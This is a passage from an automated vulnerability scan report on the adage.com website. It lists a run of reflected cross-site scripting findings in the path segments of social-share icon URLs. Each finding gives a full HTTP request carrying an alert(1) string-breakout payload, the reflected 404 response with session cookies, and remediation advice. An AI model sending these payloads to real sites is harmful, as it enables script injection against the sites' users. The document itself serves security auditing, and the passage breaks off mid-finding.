Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=74E2CD078A8986D4135E450A33C6290B7C42F007; path=/
Set-Cookie: HMAC=392B55BCA1E03D8535ADDEEAE867C1CCCD75E4D2; path=/
Set-Cookie: HMAC=23835443FF3E360F4A3864CD2B1E7EEFE3D1A08B; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images46cfb"-alert(1)-"dabdda859b0/save-and-share-icons/icon-digg.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.
...[SNIP]...

1.17. http://adage.com//images/save-and-share-icons/icon-digg.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-digg.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50b51"-alert(1)-"91173d12182 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons50b51"-alert(1)-"91173d12182/icon-digg.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=9F85EC95FC5CCF6F3A129357C0DE27649A57D444; path=/
Set-Cookie: HMAC=E5BB0B428316642056F232E3781183E669512112; path=/
Set-Cookie: HMAC=95D2467545921E0FBF0B688EA81D027414376278; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons50b51"-alert(1)-"91173d12182/icon-digg.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.
...[SNIP]...

1.18. http://adage.com//images/save-and-share-icons/icon-digg.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-digg.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52fec"-alert(1)-"55c76269dd8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-digg.png52fec"-alert(1)-"55c76269dd8?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=865FD9BC847936AFFE2215B1E986016872805895; path=/
Set-Cookie: HMAC=831ADF1DB456DC5F4216608A355181A1C47583A8; path=/
Set-Cookie: HMAC=BE9A4618BD27ABBA0C848601B386AF2C59F49176; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-digg.png52fec"-alert(1)-"55c76269dd8"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.19. http://adage.com//images/save-and-share-icons/icon-facebook.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-facebook.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e25a7"-alert(1)-"93324f8b867 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //imagese25a7"-alert(1)-"93324f8b867/save-and-share-icons/icon-facebook.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=8554B0B740A7DFEE6F8097323E3CD7C59ABC176A; path=/
Set-Cookie: HMAC=C01354BD03BC9F3B37AE1845F6934667D3236D01; path=/
Set-Cookie: HMAC=B8553687A487AF38670CBD42307E9CA6DCE851CA; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//imagese25a7"-alert(1)-"93324f8b867/save-and-share-icons/icon-facebook.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";

...[SNIP]...

1.20. http://adage.com//images/save-and-share-icons/icon-facebook.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-facebook.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3dadb"-alert(1)-"a0bf3312ba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons3dadb"-alert(1)-"a0bf3312ba0/icon-facebook.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:56 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=3051D16D72C7D8E285B9A8092468FB15C43D9349; path=/
Set-Cookie: HMAC=80EE0DA1BDBB6BA1205AB558857CB90E1B1D6F5B; path=/
Set-Cookie: HMAC=4E1967BA0A0BE9780A5CB755D49A8CECF9867777; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons3dadb"-alert(1)-"a0bf3312ba0/icon-facebook.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";

...[SNIP]...

1.21. http://adage.com//images/save-and-share-icons/icon-facebook.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-facebook.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 926d3"-alert(1)-"2636b1944da was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-facebook.png926d3"-alert(1)-"2636b1944da?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=C08CF54C74F5C21C98AA46D9928AFA01BD06A6C8; path=/
Set-Cookie: HMAC=4BE13DC82BDA09CFF2506A12D9EE8709E44DAD8C; path=/
Set-Cookie: HMAC=4E62AB29F3053C0ADC4A0F6B38F0248A1B4CB4E3; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
om";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-facebook.png926d3"-alert(1)-"2636b1944da"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.22. http://adage.com//images/save-and-share-icons/icon-google.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-google.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44dc9"-alert(1)-"0ee88ea36e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images44dc9"-alert(1)-"0ee88ea36e2/save-and-share-icons/icon-google.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=DE39BAE78E158CFEE55026AE4E2DCFC08A2EB9EF; path=/
Set-Cookie: HMAC=E70613A6312006CA98A290E1B7E16C8527D850B0; path=/
Set-Cookie: HMAC=FFFC9F13F0FC6AF9E21FE049C4367312B9239685; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49480
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images44dc9"-alert(1)-"0ee88ea36e2/save-and-share-icons/icon-google.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hb
...[SNIP]...

1.23. http://adage.com//images/save-and-share-icons/icon-google.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-google.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85077"-alert(1)-"33cf11815f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons85077"-alert(1)-"33cf11815f4/icon-google.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=69D00B98A40D9843C720FC7DEF85C4484BEF5E0D; path=/
Set-Cookie: HMAC=8F671288FDBD8123BC4548CF29CCA272C6515E2F; path=/
Set-Cookie: HMAC=4183A5E5EF1D9AF3D856D00B728C487271E35227; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49480
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons85077"-alert(1)-"33cf11815f4/icon-google.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hb
...[SNIP]...

1.24. http://adage.com//images/save-and-share-icons/icon-google.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-google.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a664"-alert(1)-"9cedc40d16c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-google.png8a664"-alert(1)-"9cedc40d16c?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=9C36341DD777B3492C9C98D331E172899AF6BB16; path=/
Set-Cookie: HMAC=340A0BBAD4E1C84C0082A4D2258FFF6C693D1805; path=/
Set-Cookie: HMAC=EDCD4AA76169CC1973AD5167A3962823824F6104; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49480
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-google.png8a664"-alert(1)-"9cedc40d16c"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.25. http://adage.com//images/save-and-share-icons/icon-linkedin.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-linkedin.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbc76"-alert(1)-"09d21fbc5ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //imagescbc76"-alert(1)-"09d21fbc5ca/save-and-share-icons/icon-linkedin.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=207B9D24ED2318E951809D0642985DD6D9016336; path=/
Set-Cookie: HMAC=20635416B91CF35C473AFB2953205E1D5CAC33C1; path=/
Set-Cookie: HMAC=78345DB9E2096DBBA90FED3C57754887982E7B58; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//imagescbc76"-alert(1)-"09d21fbc5ca/save-and-share-icons/icon-linkedin.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";

...[SNIP]...

1.26. http://adage.com//images/save-and-share-icons/icon-linkedin.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-linkedin.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e33a"-alert(1)-"065a4278d48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons7e33a"-alert(1)-"065a4278d48/icon-linkedin.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=C36A5F70A831BE679C3F43FB146B3909B6A679A6; path=/
Set-Cookie: HMAC=C92FD2C4F0E5060E0F00FBD881EBC5D12F77531E; path=/
Set-Cookie: HMAC=20A26BC585B339550F9CAB2B6594BCC5E19750BA; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons7e33a"-alert(1)-"065a4278d48/icon-linkedin.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";

...[SNIP]...

1.27. http://adage.com//images/save-and-share-icons/icon-linkedin.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-linkedin.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56556"-alert(1)-"6b88251e67d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

